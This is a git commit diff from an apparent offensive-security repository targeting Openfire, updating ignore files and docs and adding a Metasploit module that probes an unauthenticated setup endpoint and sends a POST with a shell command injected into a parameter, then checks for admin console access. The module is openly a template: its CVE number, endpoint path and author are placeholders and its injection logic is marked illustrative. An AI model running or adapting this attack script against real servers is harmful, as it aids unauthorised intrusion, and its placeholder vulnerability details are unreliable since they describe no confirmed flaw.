feat: Add unauthenticated Openfire setup exploit template and .gitign…

.gitignore

@@ -35,3 +35,28 @@ burp-automation/gradle/
 burp-automation/gradlew
 burp-automation/gradlew.bat
 burp-automation/settings.gradle
+
+# Ruby / Metasploit local artifacts (to keep repo slim)
+.bundle/
+vendor/bundle/
+**/.rspec_status
+coverage/
+log/
+tmp/
+metasploit-framework/log/
+metasploit-framework/tmp/
+.metastore
+pkg/
+*.gem
+*.o
+*.so
+*.bundle
+*.dSYM/
+.yardoc/
+# Local environment/version files
+.ruby-version
+.rbenv-vars
+
+# Optional: comment out if you intentionally want to track large scan outputs
+output/*.txt
+output/*.html

.gitmodules

@@ -0,0 +1,3 @@
+[submodule "metasploit-module/metasploit-framework"]
+	path = metasploit-module/metasploit-framework
+	url = https://github.com/rapid7/metasploit-framework

README.md

@@ -22,9 +22,34 @@
 
 - **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console.
 - **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework.
-- **burp-automation/**: Java-based Burp Suite Extender plugin template with macro hook support.
+- **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17).
 - **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports.
 
+## 🧠 Burp Extender Plugin (minimal)
+
+Entry point class (required by Burp):
+```
+burp-automation/src/main/java/burp/BurpExtender.java
+```
+
+This class implements `IBurpExtender` and `IHttpListener` and logs basic request URLs. The packaged JAR intentionally includes only the entry class so that Burp’s own API types are used at runtime (avoids interface mismatches).
+
+Build and load into Burp:
+
+```bash
+cd burp-automation
+./gradlew clean build
+jar tf build/libs/burp-automation.jar | sort   # should list only: burp/BurpExtender.class (plus META-INF)
+```
+
+In Burp Suite: Extender → Extensions → Add → `build/libs/burp-automation.jar`
+
+Expected output lines in Burp:
+- `[BurpExtender] IHttpListener registered`
+- `[HTTP] https://example/…` (for each intercepted request)
+
+> Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes.
+
 ## 🚀 CVE-2023-32315 Summary
 
 Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal:
@@ -67,12 +92,6 @@ run
 
 Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb`
 
-## 🧠 Burp Extender Plugin
-
-Implement `IBurpExtender`, `IHttpListener`, or `IExtensionStateListener` to log/replay HTTP macro sequences or inject payloads post-auth bypass. Plugin class lives in:
-```
-burp-automation/src/main/java/org/ragfish/burp/BurpMacroHandler.java
-```
 
 ## 📂 Git Strategy
 

docs/index.md

@@ -16,9 +16,34 @@
 
 - **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console.
 - **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework.
-- **burp-automation/**: Java-based Burp Suite Extender plugin template with macro hook support.
+- **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17).
 - **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports.
 
+## 🧠 Burp Extender Plugin (minimal)
+
+Entry point class (required by Burp):
+```
+burp-automation/src/main/java/burp/BurpExtender.java
+```
+
+This class implements `IBurpExtender` and `IHttpListener` and logs basic request URLs. The packaged JAR intentionally includes only the entry class so that Burp’s own API types are used at runtime (avoids interface mismatches).
+
+Build and load into Burp:
+
+```bash
+cd burp-automation
+./gradlew clean build
+jar tf build/libs/burp-automation.jar | sort   # should list only: burp/BurpExtender.class (plus META-INF)
+```
+
+In Burp Suite: Extender → Extensions → Add → `build/libs/burp-automation.jar`
+
+Expected output lines in Burp:
+- `[BurpExtender] IHttpListener registered`
+- `[HTTP] https://example/…` (for each intercepted request)
+
+> Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes.
+
 ## 🚀 CVE-2023-32315 Summary
 
 Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal:
@@ -61,13 +86,6 @@ run
 
 Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb`
 
-## 🧠 Burp Extender Plugin
-
-Implement `IBurpExtender`, `IHttpListener`, or `IExtensionStateListener` to log/replay HTTP macro sequences or inject payloads post-auth bypass. Plugin class lives in:
-```
-burp-automation/src/main/java/org/ragfish/burp/BurpMacroHandler.java
-```
-
 ## 📂 Git Strategy
 
 Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts.
@@ -80,7 +98,7 @@ Developed by Taka (2025) as a security research utility in response to active ex
 
 To view a rendered version of this documentation:
 
-- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror this README as index.md
+- [GitHub Pages: docs/index.md](docs/index.md)
 - Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs`
 
 ## 📸 Screenshots / Demo

metasploit-module/exploits/linux/http/openfire_setup_unauth.rb

@@ -0,0 +1,153 @@
+# frozen_string_literal: true
+# Exploit: Openfire unauthenticated setup endpoint abuse (CVE-2023-XXXX placeholder)
+# This module demonstrates unauthenticated POST access to a setup JSP that should
+# no longer be reachable after initial installation. Abuse may allow config
+# manipulation or arbitrary command execution depending on vulnerable parameter handling.
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Openfire Unauthenticated Setup POST (CVE-2023-XXXX)',
+        'Description' => %q{
+          Exploits an unauthenticated exposure of an Openfire setup endpoint
+          (/setup/setup-someform.jsp) allowing POST parameter injection. The
+          endpoint should be disabled after installation; improper access control
+          permits attackers to submit crafted parameters that may alter server
+          configuration or trigger command execution (context dependent).
+        },
+        'Author' => [ 'YourName' ],
+        'License' => MSF_LICENSE,
+        'References' => [ [ 'CVE', '2023-XXXX' ] ],
+        'Platform' => [ 'linux' ],
+        'Arch' => ARCH_CMD,
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-06-10'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptString.new('TARGETURI', [ true, 'Vulnerable setup endpoint', '/setup/setup-someform.jsp' ]),
+        OptString.new('INJECT_PARAM', [ true, 'Parameter name to inject', 'xmppDomain' ]),
+        OptString.new('CMD', [ false, 'Command to execute (if command injection is viable)', 'id' ]),
+        OptInt.new('TIMEOUT', [ true, 'HTTP connection/read timeout (s)', 10 ])
+      ]
+    )
+  end
+
+  # Convenience accessor for the normalized vulnerable endpoint
+  def vuln_path
+    normalize_uri(datastore['TARGETURI'])
+  end
+
+  def check
+    print_status('Checking exposure of setup endpoint (GET) ...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => vuln_path
+    }, datastore['TIMEOUT'])
+
+    unless res
+      print_status('No response while probing setup endpoint')
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 200 && (res.body =~ /Openfire/i || res.body =~ /Setup/i)
+      print_status("Setup endpoint reachable (HTTP #{res.code}) - appears vulnerable")
+      return Exploit::CheckCode::Appears
+    else
+      print_status("Unexpected response (HTTP #{res.code}) - body length=#{res.body.to_s.length}")
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def build_payload
+    inj_param = datastore['INJECT_PARAM']
+    cmd = datastore['CMD']
+    safe_cmd = Rex::Text.shell_escape(cmd)
+
+    # NOTE: This is illustrative. Real exploit params depend on specific vulnerable logic.
+    # We include a pseudo command injection marker expecting server-side evaluation in vulnerable versions.
+    base = {
+      'locale' => 'en',
+      'setup' => 'true',
+      inj_param => "test'; #{safe_cmd}; '"
+    }
+
+    Rex::Text.uri_query(base)
+  end
+
+  def do_post(data)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => vuln_path,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => data
+    }, datastore['TIMEOUT'])
+  end
+
+  def parse_success?(res)
+    return false unless res
+    return true if res.code.between?(200, 302) && res.body.to_s =~ /(Openfire|success|applied|configuration)/i
+    false
+  end
+
+  def exploit
+    print_status("Target: #{rhost}:#{rport} -> #{vuln_path}")
+
+    print_status('Stage 1: Verifying endpoint accessibility (GET)')
+    probe = send_request_cgi({ 'method' => 'GET', 'uri' => vuln_path }, datastore['TIMEOUT'])
+
+    unless probe
+      fail_with(Failure::Unreachable, 'No response from target during initial probe')
+    end
+
+    if probe.code == 404
+      fail_with(Failure::NotFound, 'Setup endpoint not found')
+    end
+
+    print_status("Probe HTTP #{probe.code}, length=#{probe.body.to_s.length}")
+
+    unless probe.code == 200
+      print_status('Continuing despite non-200 (heuristic)')
+    end
+
+    print_status('Stage 2: Crafting POST payload')
+    payload_data = build_payload
+    print_status("POST body: #{payload_data}")
+
+    print_status('Stage 3: Sending malicious POST')
+    res = do_post(payload_data)
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response to exploit POST')
+    end
+
+    print_status("Exploit POST HTTP #{res.code}, length=#{res.body.to_s.length}")
+
+    if parse_success?(res)
+      print_good('Indicators of success observed in response.')
+    else
+      fail_with(Failure::UnexpectedReply, 'Response did not contain expected success indicators')
+    end
+
+    # Optional: follow-up GET to admin console root to verify bypass
+    print_status('Stage 4: Attempting to access admin console root /index.jsp')
+    admin_res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/index.jsp') }, datastore['TIMEOUT'])
+
+    if admin_res && admin_res.code == 200 && admin_res.body =~ /Openfire Admin/i
+      print_good('Admin console appears accessible (unauthenticated).')
+    else
+      print_status('Admin console accessibility could not be confirmed automatically.')
+    end
+  end
+end
+